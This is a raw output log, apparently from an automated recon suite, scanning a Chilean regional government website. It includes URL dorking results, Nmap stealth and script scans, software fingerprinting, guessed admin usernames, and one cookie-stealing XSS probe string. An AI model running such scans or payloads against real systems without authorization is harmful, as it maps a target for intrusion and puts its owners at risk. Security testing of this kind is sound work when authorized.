3342|_[ + ] [ 58 / 100 ]-[17:21:15] [ - ]
3343|_[ + ] Target:: [ https://www.dellibertador.cl/index.php?option=com_content&view=article&id=61&Itemid=81 ]
3344|_[ + ] Exploit::
3345|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3346|_[ + ] More details:: / - / , ISP:
3347|_[ + ] Found:: UNIDENTIFIED
3348
3349 _[ - ]::--------------------------------------------------------------------------------------------------------------
3350|_[ + ] [ 59 / 100 ]-[17:21:18] [ - ]
3351|_[ + ] Target:: [ https://www.dellibertador.cl/core/acuerdos/2014/acuerdo_4184.pdf ]
3352|_[ + ] Exploit::
3353|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3354|_[ + ] More details:: / - / , ISP:
3355|_[ + ] Found:: UNIDENTIFIED
3356
3357 _[ - ]::--------------------------------------------------------------------------------------------------------------
3358|_[ + ] [ 60 / 100 ]-[17:21:22] [ - ]
3359|_[ + ] Target:: [ https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_6184.pdf ]
3360|_[ + ] Exploit::
3361|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3362|_[ + ] More details:: / - / , ISP:
3363|_[ + ] Found:: UNIDENTIFIED
3364
3365 _[ - ]::--------------------------------------------------------------------------------------------------------------
3366|_[ + ] [ 61 / 100 ]-[17:21:25] [ - ]
3367|_[ + ] Target:: [ https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_6036.pdf ]
3368|_[ + ] Exploit::
3369|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3370|_[ + ] More details:: / - / , ISP:
3371|_[ + ] Found:: UNIDENTIFIED
3372
3373 _[ - ]::--------------------------------------------------------------------------------------------------------------
3374|_[ + ] [ 62 / 100 ]-[17:21:28] [ - ]
3375|_[ + ] Target:: [ https://www.dellibertador.cl/core/acuerdos/2012/acuerdo_3698.pdf ]
3376|_[ + ] Exploit::
3377|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3378|_[ + ] More details:: / - / , ISP:
3379|_[ + ] Found:: UNIDENTIFIED
3380
3381 _[ - ]::--------------------------------------------------------------------------------------------------------------
3382|_[ + ] [ 63 / 100 ]-[17:21:31] [ - ]
3383|_[ + ] Target:: [ https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_5596.pdf ]
3384|_[ + ] Exploit::
3385|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3386|_[ + ] More details:: / - / , ISP:
3387|_[ + ] Found:: UNIDENTIFIED
3388
3389 _[ - ]::--------------------------------------------------------------------------------------------------------------
3390|_[ + ] [ 64 / 100 ]-[17:21:34] [ - ]
3391|_[ + ] Target:: [ https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_5617.pdf ]
3392|_[ + ] Exploit::
3393|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3394|_[ + ] More details:: / - / , ISP:
3395|_[ + ] Found:: UNIDENTIFIED
3396
3397 _[ - ]::--------------------------------------------------------------------------------------------------------------
3398|_[ + ] [ 65 / 100 ]-[17:21:37] [ - ]
3399|_[ + ] Target:: [ https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_5970.pdf ]
3400|_[ + ] Exploit::
3401|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3402|_[ + ] More details:: / - / , ISP:
3403|_[ + ] Found:: UNIDENTIFIED
3404
3405 _[ - ]::--------------------------------------------------------------------------------------------------------------
3406|_[ + ] [ 66 / 100 ]-[17:21:42] [ - ]
3407|_[ + ] Target:: [ https://www.dellibertador.cl/d3/fndr/6-cultura-deporte-seguridad/78-deporte-alto-rendimiento ]
3408|_[ + ] Exploit::
3409|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3410|_[ + ] More details:: / - / , ISP:
3411|_[ + ] Found:: UNIDENTIFIED
3412
3413 _[ - ]::--------------------------------------------------------------------------------------------------------------
3414|_[ + ] [ 67 / 100 ]-[17:21:45] [ - ]
3415|_[ + ] Target:: [ https://www.dellibertador.cl/core/acuerdos/2017/acuerdo_4985.pdf ]
3416|_[ + ] Exploit::
3417|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3418|_[ + ] More details:: / - / , ISP:
3419|_[ + ] Found:: UNIDENTIFIED
3420
3421 _[ - ]::--------------------------------------------------------------------------------------------------------------
3422|_[ + ] [ 68 / 100 ]-[17:21:48] [ - ]
3423|_[ + ] Target:: [ https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_5953.pdf ]
3424|_[ + ] Exploit::
3425|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3426|_[ + ] More details:: / - / , ISP:
3427|_[ + ] Found:: UNIDENTIFIED
3428
3429 _[ - ]::--------------------------------------------------------------------------------------------------------------
3430|_[ + ] [ 69 / 100 ]-[17:21:51] [ - ]
3431|_[ + ] Target:: [ https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_5981.pdf ]
3432|_[ + ] Exploit::
3433|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3434|_[ + ] More details:: / - / , ISP:
3435|_[ + ] Found:: UNIDENTIFIED
3436
3437 _[ - ]::--------------------------------------------------------------------------------------------------------------
3438|_[ + ] [ 70 / 100 ]-[17:21:57] [ - ]
3439|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/chatarrizacion/2019/res_exe_0975.pdf ]
3440|_[ + ] Exploit::
3441|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3442|_[ + ] More details:: / - / , ISP:
3443|_[ + ] Found:: UNIDENTIFIED
3444
3445 _[ - ]::--------------------------------------------------------------------------------------------------------------
3446|_[ + ] [ 71 / 100 ]-[17:22:00] [ - ]
3447|_[ + ] Target:: [ http://www.dellibertador.cl/diplan/2016/diario_oficial_12-02-2016.pdf ]
3448|_[ + ] Exploit::
3449|_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:200.54.230.247:80
3450|_[ + ] More details:: / - / , ISP:
3451|_[ + ] Found:: UNIDENTIFIED
3452
3453 _[ - ]::--------------------------------------------------------------------------------------------------------------
3454|_[ + ] [ 72 / 100 ]-[17:22:03] [ - ]
3455|_[ + ] Target:: [ https://www.dellibertador.cl/core/actas/2008/ordinarias/ACTA_365_ORDINARIA.pdf ]
3456|_[ + ] Exploit::
3457|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3458|_[ + ] More details:: / - / , ISP:
3459|_[ + ] Found:: UNIDENTIFIED
3460
3461 _[ - ]::--------------------------------------------------------------------------------------------------------------
3462|_[ + ] [ 73 / 100 ]-[17:22:05] [ - ]
3463|_[ + ] Target:: [ http://www.dellibertador.cl/documentos/2008-2009/resoluciones/0676.pdf ]
3464|_[ + ] Exploit::
3465|_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:200.54.230.247:80
3466|_[ + ] More details:: / - / , ISP:
3467|_[ + ] Found:: UNIDENTIFIED
3468
3469 _[ - ]::--------------------------------------------------------------------------------------------------------------
3470|_[ + ] [ 74 / 100 ]-[17:22:08] [ - ]
3471|_[ + ] Target:: [ https://www.dellibertador.cl/core/actas/2016/ordinarias/acta_ordinaria_536.pdf ]
3472|_[ + ] Exploit::
3473|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3474|_[ + ] More details:: / - / , ISP:
3475|_[ + ] Found:: UNIDENTIFIED
3476
3477 _[ - ]::--------------------------------------------------------------------------------------------------------------
3478|_[ + ] [ 75 / 100 ]-[17:22:14] [ - ]
3479|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/fic/2019/listado_proyectos_inadmisibles.pdf ]
3480|_[ + ] Exploit::
3481|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3482|_[ + ] More details:: / - / , ISP:
3483|_[ + ] Found:: UNIDENTIFIED
3484
3485 _[ - ]::--------------------------------------------------------------------------------------------------------------
3486|_[ + ] [ 76 / 100 ]-[17:22:17] [ - ]
3487|_[ + ] Target:: [ https://www.dellibertador.cl/core/actas/2016/ordinarias/acta_ordinaria_555.pdf ]
3488|_[ + ] Exploit::
3489|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3490|_[ + ] More details:: / - / , ISP:
3491|_[ + ] Found:: UNIDENTIFIED
3492
3493 _[ - ]::--------------------------------------------------------------------------------------------------------------
3494|_[ + ] [ 77 / 100 ]-[17:22:23] [ - ]
3495|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/docs/2020/fondes_bases_2020.pdf ]
3496|_[ + ] Exploit::
3497|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3498|_[ + ] More details:: / - / , ISP:
3499|_[ + ] Found:: UNIDENTIFIED
3500
3501 _[ - ]::--------------------------------------------------------------------------------------------------------------
3502|_[ + ] [ 78 / 100 ]-[17:22:25] [ - ]
3503|_[ + ] Target:: [ http://www.dellibertador.cl/documentos/2008-2009/resoluciones/1968.pdf ]
3504|_[ + ] Exploit::
3505|_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:200.54.230.247:80
3506|_[ + ] More details:: / - / , ISP:
3507|_[ + ] Found:: UNIDENTIFIED
3508
3509 _[ - ]::--------------------------------------------------------------------------------------------------------------
3510|_[ + ] [ 79 / 100 ]-[17:22:31] [ - ]
3511|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/6porciento/2019/instructivo_general.pdf ]
3512|_[ + ] Exploit::
3513|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3514|_[ + ] More details:: / - / , ISP:
3515|_[ + ] Found:: UNIDENTIFIED
3516
3517 _[ - ]::--------------------------------------------------------------------------------------------------------------
3518|_[ + ] [ 80 / 100 ]-[17:22:37] [ - ]
3519|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/fic/2019/res_exe_0615_aprueba_bases_fic.pdf ]
3520|_[ + ] Exploit::
3521|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3522|_[ + ] More details:: / - / , ISP:
3523|_[ + ] Found:: UNIDENTIFIED
3524
3525 _[ - ]::--------------------------------------------------------------------------------------------------------------
3526|_[ + ] [ 81 / 100 ]-[17:22:43] [ - ]
3527|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/fic/2019/resultado_concurso_acuerdo_6164.pdf ]
3528|_[ + ] Exploit::
3529|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3530|_[ + ] More details:: / - / , ISP:
3531|_[ + ] Found:: UNIDENTIFIED
3532
3533 _[ - ]::--------------------------------------------------------------------------------------------------------------
3534|_[ + ] [ 82 / 100 ]-[17:22:49] [ - ]
3535|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/chatarrizacion/2019/res_exe_0974.pdf ]
3536|_[ + ] Exploit::
3537|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3538|_[ + ] More details:: / - / , ISP:
3539|_[ + ] Found:: UNIDENTIFIED
3540
3541 _[ - ]::--------------------------------------------------------------------------------------------------------------
3542|_[ + ] [ 83 / 100 ]-[17:22:52] [ - ]
3543|_[ + ] Target:: [ https://www.dellibertador.cl/core/actas/2010/extraordinarias/actaextraordinaria180.pdf ]
3544|_[ + ] Exploit::
3545|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3546|_[ + ] More details:: / - / , ISP:
3547|_[ + ] Found:: UNIDENTIFIED
3548
3549 _[ - ]::--------------------------------------------------------------------------------------------------------------
3550|_[ + ] [ 84 / 100 ]-[17:22:58] [ - ]
3551|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/fic/2019/presentacion_bases.pdf ]
3552|_[ + ] Exploit::
3553|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3554|_[ + ] More details:: / - / , ISP:
3555|_[ + ] Found:: UNIDENTIFIED
3556
3557 _[ - ]::--------------------------------------------------------------------------------------------------------------
3558|_[ + ] [ 85 / 100 ]-[17:23:04] [ - ]
3559|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/docs/2020/fondes_circular_2020.pdf ]
3560|_[ + ] Exploit::
3561|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3562|_[ + ] More details:: / - / , ISP:
3563|_[ + ] Found:: UNIDENTIFIED
3564
3565 _[ - ]::--------------------------------------------------------------------------------------------------------------
3566|_[ + ] [ 86 / 100 ]-[17:23:06] [ - ]
3567|_[ + ] Target:: [ http://www.dellibertador.cl/diplan/2016/diario_el_rancaguino_15-02-2016.pdf ]
3568|_[ + ] Exploit::
3569|_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:200.54.230.247:80
3570|_[ + ] More details:: / - / , ISP:
3571|_[ + ] Found:: UNIDENTIFIED
3572
3573 _[ - ]::--------------------------------------------------------------------------------------------------------------
3574|_[ + ] [ 87 / 100 ]-[17:23:09] [ - ]
3575|_[ + ] Target:: [ https://www.dellibertador.cl/core/actas/2012/ordinarias/acta_ordinaria_443.pdf ]
3576|_[ + ] Exploit::
3577|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3578|_[ + ] More details:: / - / , ISP:
3579|_[ + ] Found:: UNIDENTIFIED
3580
3581 _[ - ]::--------------------------------------------------------------------------------------------------------------
3582|_[ + ] [ 88 / 100 ]-[17:23:15] [ - ]
3583|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/docs/2020/plan_recursos_hidricos_2020–2029.pdf ]
3584|_[ + ] Exploit::
3585|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3586|_[ + ] More details:: / - / , ISP:
3587|_[ + ] Found:: UNIDENTIFIED
3588
3589 _[ - ]::--------------------------------------------------------------------------------------------------------------
3590|_[ + ] [ 89 / 100 ]-[17:23:21] [ - ]
3591|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/fic/2019/consultas.pdf ]
3592|_[ + ] Exploit::
3593|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3594|_[ + ] More details:: / - / , ISP:
3595|_[ + ] Found:: UNIDENTIFIED
3596
3597 _[ - ]::--------------------------------------------------------------------------------------------------------------
3598|_[ + ] [ 90 / 100 ]-[17:23:26] [ - ]
3599|_[ + ] Target:: [ https://www.dellibertador.cl/d3/noticias/noticias-gore/56-gobierno-inaugura-dos-modernos-edificios-de-salud ]
3600|_[ + ] Exploit::
3601|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3602|_[ + ] More details:: / - / , ISP:
3603|_[ + ] Found:: UNIDENTIFIED
3604
3605 _[ - ]::--------------------------------------------------------------------------------------------------------------
3606|_[ + ] [ 91 / 100 ]-[17:23:31] [ - ]
3607|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/fic/2019/listado_proyectos_admisibles.pdf ]
3608|_[ + ] Exploit::
3609|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3610|_[ + ] More details:: / - / , ISP:
3611|_[ + ] Found:: UNIDENTIFIED
3612
3613 _[ - ]::--------------------------------------------------------------------------------------------------------------
3614|_[ + ] [ 92 / 100 ]-[17:23:36] [ - ]
3615|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/fic/2019/listado_proyectos_elegibles.pdf ]
3616|_[ + ] Exploit::
3617|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3618|_[ + ] More details:: / - / , ISP:
3619|_[ + ] Found:: UNIDENTIFIED
3620
3621 _[ - ]::--------------------------------------------------------------------------------------------------------------
3622|_[ + ] [ 93 / 100 ]-[17:23:38] [ - ]
3623|_[ + ] Target:: [ http://www.dellibertador.cl/cultura_deporte_seguridad_2013/septiembre/aprobados_2dollamado2013_CULTURA_publico.html?ml=1 ]
3624|_[ + ] Exploit::
3625|_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:200.54.230.247:80
3626|_[ + ] More details:: / - / , ISP:
3627|_[ + ] Found:: UNIDENTIFIED
3628
3629 _[ - ]::--------------------------------------------------------------------------------------------------------------
3630|_[ + ] [ 94 / 100 ]-[17:23:41] [ - ]
3631|_[ + ] Target:: [ https://www.dellibertador.cl/noticias/noticias-gobierno-regional/982-expomundorural-2015…ven-a-vivir-el-campo.html ]
3632|_[ + ] Exploit::
3633|_[ + ] Information Server:: HTTP/2 404 , , IP:200.54.230.247:443
3634|_[ + ] More details:: / - / , ISP:
3635|_[ + ] Found:: UNIDENTIFIED
3636
3637 _[ - ]::--------------------------------------------------------------------------------------------------------------
3638|_[ + ] [ 95 / 100 ]-[17:23:47] [ - ]
3639|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/6porciento/2019/adulto_mayor/financiados_adulto_mayor_2019.html ]
3640|_[ + ] Exploit::
3641|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3642|_[ + ] More details:: / - / , ISP:
3643|_[ + ] Found:: UNIDENTIFIED
3644
3645 _[ - ]::--------------------------------------------------------------------------------------------------------------
3646|_[ + ] [ 96 / 100 ]-[17:23:53] [ - ]
3647|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/6porciento/2020/alto_rendimiento/instructivo_alto_rendimiento.pdf ]
3648|_[ + ] Exploit::
3649|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3650|_[ + ] More details:: / - / , ISP:
3651|_[ + ] Found:: UNIDENTIFIED
3652
3653 _[ - ]::--------------------------------------------------------------------------------------------------------------
3654|_[ + ] [ 97 / 100 ]-[17:23:57] [ - ]
3655|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/docs/2020/fondes_requisitos_2020.pdf ]
3656|_[ + ] Exploit::
3657|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3658|_[ + ] More details:: / - / , ISP:
3659|_[ + ] Found:: UNIDENTIFIED
3660
3661 _[ - ]::--------------------------------------------------------------------------------------------------------------
3662|_[ + ] [ 98 / 100 ]-[17:24:03] [ - ]
3663|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/6porciento/2019/deporte/instructivo_deporte.pdf ]
3664|_[ + ] Exploit::
3665|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3666|_[ + ] More details:: / - / , ISP:
3667|_[ + ] Found:: UNIDENTIFIED
3668
3669 _[ - ]::--------------------------------------------------------------------------------------------------------------
3670|_[ + ] [ 99 / 100 ]-[17:24:09] [ - ]
3671|_[ + ] Target:: [ https://www.dellibertador.cl/d3/images/6porciento/2020/1er_llamado/instructivo_cultura.pdf ]
3672|_[ + ] Exploit::
3673|_[ + ] Information Server:: HTTP/2 200 , , IP:200.54.230.247:443
3674|_[ + ] More details:: / - / , ISP:
3675|_[ + ] Found:: UNIDENTIFIED
3676
3677[ INFO ] [ Shutting down ]
3678[ INFO ] [ End of process INURLBR at [12-03-2020 17:24:09]
3679[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
3680[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.dellibertador.cl/output/inurlbr-www.dellibertador.cl ]
3681|_________________________________________________________________________________________
3682
3683\_________________________________________________________________________________________/
3684####################################################################################################################################
3685Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 17:24 EDT
3686NSE: Loaded 49 scripts for scanning.
3687NSE: Script Pre-scanning.
3688Initiating NSE at 17:24
3689Completed NSE at 17:24, 0.00s elapsed
3690Initiating NSE at 17:24
3691Completed NSE at 17:24, 0.00s elapsed
3692Initiating Ping Scan at 17:24
3693Scanning www.dellibertador.cl (200.54.230.247) [4 ports]
3694Completed Ping Scan at 17:24, 0.39s elapsed (1 total hosts)
3695Initiating Parallel DNS resolution of 1 host. at 17:24
3696Completed Parallel DNS resolution of 1 host. at 17:24, 0.02s elapsed
3697Initiating SYN Stealth Scan at 17:24
3698Scanning www.dellibertador.cl (200.54.230.247) [1 port]
3699Discovered open port 110/tcp on 200.54.230.247
3700Completed SYN Stealth Scan at 17:24, 0.42s elapsed (1 total ports)
3701Initiating Service scan at 17:24
3702Scanning 1 service on www.dellibertador.cl (200.54.230.247)
3703Completed Service scan at 17:24, 1.00s elapsed (1 service on 1 host)
3704Initiating OS detection (try #1) against www.dellibertador.cl (200.54.230.247)
3705Retrying OS detection (try #2) against www.dellibertador.cl (200.54.230.247)
3706Initiating Traceroute at 17:24
3707Completed Traceroute at 17:24, 3.33s elapsed
3708Initiating Parallel DNS resolution of 15 hosts. at 17:24
3709Completed Parallel DNS resolution of 15 hosts. at 17:24, 1.21s elapsed
3710NSE: Script scanning 200.54.230.247.
3711Initiating NSE at 17:24
3712NSE Timing: About 68.66% done; ETC: 17:26 (0:00:30 remaining)
3713Completed NSE at 17:25, 90.09s elapsed
3714Initiating NSE at 17:25
3715Completed NSE at 17:25, 0.05s elapsed
3716Nmap scan report for www.dellibertador.cl (200.54.230.247)
3717Host is up (0.47s latency).
3718rDNS record for 200.54.230.247: plesk.tdata.cloud
3719
3720PORT STATE SERVICE VERSION
3721110/tcp open pop3 Dovecot pop3d
3722|_pop3-capabilities: RESP-CODES UIDL APOP SASL(PLAIN LOGIN CRAM-MD5) PIPELINING STLS USER TOP AUTH-RESP-CODE CAPA
3723Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3724Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
3725No exact OS matches for host (test conditions non-ideal).
3726Uptime guess: 2.046 days (since Tue Mar 10 16:19:46 2020)
3727Network Distance: 19 hops
3728TCP Sequence Prediction: Difficulty=263 (Good luck!)
3729IP ID Sequence Generation: All zeros
3730
3731TRACEROUTE (using port 110/tcp)
3732HOP RTT ADDRESS
37331 198.95 ms 10.202.5.1
37342 314.89 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
37353 314.83 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
37364 314.89 ms be3591.ccr51.zrh02.atlas.cogentco.com (130.117.50.182)
37375 314.95 ms be3072.ccr21.muc03.atlas.cogentco.com (130.117.0.18)
37386 314.99 ms be2959.ccr41.fra03.atlas.cogentco.com (154.54.36.53)
37397 315.05 ms be3187.agr41.fra03.atlas.cogentco.com (130.117.1.117)
37408 315.08 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
37419 315.11 ms 176.52.248.119
374210 260.64 ms 94.142.97.121
374311 342.39 ms 176.52.248.54
374412 570.27 ms 5.53.7.171
374513 ...
374614 452.00 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
374715 570.14 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
374816 ... 18
374919 451.86 ms plesk.tdata.cloud (200.54.230.247)
3750
3751NSE: Script Post-scanning.
3752Initiating NSE at 17:25
3753Completed NSE at 17:25, 0.00s elapsed
3754Initiating NSE at 17:25
3755Completed NSE at 17:25, 0.00s elapsed
3756#####################################################################################################################################
3757HTTP/2 200
3758server: nginx
3759date: Thu, 12 Mar 2020 21:25:58 GMT
3760content-type: text/html
3761content-length: 166
3762x-accel-version: 0.01
3763last-modified: Tue, 24 Dec 2019 03:09:05 GMT
3764etag: "a6-59a6a77779c61"
3765accept-ranges: bytes
3766x-powered-by: PleskLin
3767####################################################################################################################################
3768https://www.dellibertador.cl [200 OK] Country[CHILE][CL], HTTPServer[nginx], IP[200.54.230.247], Meta-Refresh-Redirect[https://www.dellibertador.cl/d3/], Plesk[Lin], Title[Gore O'Higgins], UncommonHeaders[x-accel-version], X-Powered-By[PleskLin], nginx
3769https://www.dellibertador.cl/d3/ [200 OK] Bootstrap, Cookies[f4528e99b1258780d7d15999091df8c3], Country[CHILE][CL], HTML5, HTTPServer[nginx], HttpOnly[f4528e99b1258780d7d15999091df8c3], IP[200.54.230.247], JQuery, MetaGenerator[Joomla! - Open Source Content Management], PHP[7.3.15,], Plesk[Lin], Script[application/json,text/javascript], Title[Inicio], UncommonHeaders[x-content-type-options], X-Powered-By[PHP/7.3.15, PleskLin], X-UA-Compatible[IE=edge], nginx
3770####################################################################################################################################
3771
3772wig - WebApp Information Gatherer
3773
3774
3775Scanning https://www.dellibertador.cl...
3776________________________________________ SITE INFO _________________________________________
3777IP Title
3778200.54.230.247 Gore O'Higgins
3779
3780_________________________________________ VERSION __________________________________________
3781Name Versions Type
3782Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.5 | 2.4.6 | 2.4.7 | 2.4.8 Platform
3783 2.4.9
3784PHP 7.3.15 Platform
3785nginx Platform
3786
3787____________________________________________________________________________________________
3788Time: 1.4 sec Urls: 809 Fingerprints: 40401
3789######################################################################################################################################
3790Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 17:28 EDT
3791NSE: Loaded 161 scripts for scanning.
3792NSE: Script Pre-scanning.
3793Initiating NSE at 17:28
3794Completed NSE at 17:28, 0.00s elapsed
3795Initiating NSE at 17:28
3796Completed NSE at 17:28, 0.00s elapsed
3797Initiating Parallel DNS resolution of 1 host. at 17:28
3798Completed Parallel DNS resolution of 1 host. at 17:28, 0.02s elapsed
3799Initiating SYN Stealth Scan at 17:28
3800Scanning www.dellibertador.cl (200.54.230.247) [1 port]
3801Discovered open port 443/tcp on 200.54.230.247
3802Completed SYN Stealth Scan at 17:28, 0.50s elapsed (1 total ports)
3803Initiating Service scan at 17:28
3804Scanning 1 service on www.dellibertador.cl (200.54.230.247)
3805Completed Service scan at 17:28, 15.03s elapsed (1 service on 1 host)
3806Initiating OS detection (try #1) against www.dellibertador.cl (200.54.230.247)
3807Retrying OS detection (try #2) against www.dellibertador.cl (200.54.230.247)
3808Initiating Traceroute at 17:28
3809Completed Traceroute at 17:28, 3.32s elapsed
3810Initiating Parallel DNS resolution of 14 hosts. at 17:28
3811Completed Parallel DNS resolution of 14 hosts. at 17:28, 1.08s elapsed
3812NSE: Script scanning 200.54.230.247.
3813Initiating NSE at 17:28
3814Completed NSE at 17:30, 90.20s elapsed
3815Initiating NSE at 17:30
3816Completed NSE at 17:30, 3.53s elapsed
3817Nmap scan report for www.dellibertador.cl (200.54.230.247)
3818Host is up (0.51s latency).
3819rDNS record for 200.54.230.247: plesk.tdata.cloud
3820
3821PORT STATE SERVICE VERSION
3822443/tcp open ssl/http nginx
3823| http-brute:
3824|_ Path "/" does not require authentication
3825|_http-chrono: Request times for /; avg: 2217.96ms; min: 1937.08ms; max: 2436.79ms
3826|_http-csrf: Couldn't find any CSRF vulnerabilities.
3827|_http-date: Thu, 12 Mar 2020 21:29:21 GMT; -6s from local time.
3828|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
3829|_http-dombased-xss: Couldn't find any DOM based XSS.
3830|_http-errors: Couldn't find any error pages.
3831|_http-feed: Couldn't find any feeds.
3832|_http-fetch: Please enter the complete path of the directory to save data in.
3833| http-headers:
3834| Server: nginx
3835| Date: Thu, 12 Mar 2020 21:29:38 GMT
3836| Content-Type: text/html
3837| Content-Length: 166
3838| Connection: close
3839| X-Accel-Version: 0.01
3840| Last-Modified: Tue, 24 Dec 2019 03:09:05 GMT
3841| ETag: "a6-59a6a77779c61"
3842| Accept-Ranges: bytes
3843| X-Powered-By: PleskLin
3844|
3845|_ (Request type: GET)
3846|_http-jsonp-detection: Couldn't find any JSONP endpoints.
3847| http-methods:
3848|_ Supported Methods: GET HEAD POST OPTIONS
3849|_http-mobileversion-checker: No mobile version detected.
3850| http-php-version: Logo query returned unknown hash 6642c9bfd558ee760e6a0d29c7c55c85
3851|_Credits query returned unknown hash 6642c9bfd558ee760e6a0d29c7c55c85
3852| http-security-headers:
3853| Strict_Transport_Security:
3854|_ HSTS not configured in HTTPS Server
3855| http-sitemap-generator:
3856| Directory structure:
3857| /
3858| Other: 1
3859| Longest directory structure:
3860| Depth: 0
3861| Dir: /
3862| Total files found (by extension):
3863|_ Other: 1
3864|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3865|_http-title: Gore O'Higgins
3866| http-traceroute:
3867| HTML title
3868| Hop #1: 400 The plain HTTP request was sent to HTTPS port
3869| Hop #2: Gore O'Higgins
3870| Hop #3: Gore O'Higgins
3871| Status Code
3872| Hop #1: 400
3873| Hop #2: 200
3874| Hop #3: 200
3875| content-length
3876| Hop #1: 248
3877| Hop #2: 166
3878| Hop #3: 166
3879| last-modified
3880| Hop #1
3881| Hop #2: Tue, 24 Dec 2019 03:09:05 GMT
3882|_ Hop #3: Tue, 24 Dec 2019 03:09:05 GMT
3883|_http-userdir-enum: Potential Users: root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test
3884| http-vhosts:
3885| cvs.dellibertador.cl : 400
3886| ntp.dellibertador.cl : 400
3887|_125 names had status 200
3888| http-waf-detect: IDS/IPS/WAF detected:
3889|_www.dellibertador.cl:443/?p4yl04d3=<script>alert(document.cookie)</script>
3890|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
3891|_http-xssed: No previously reported XSS vuln.
3892Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
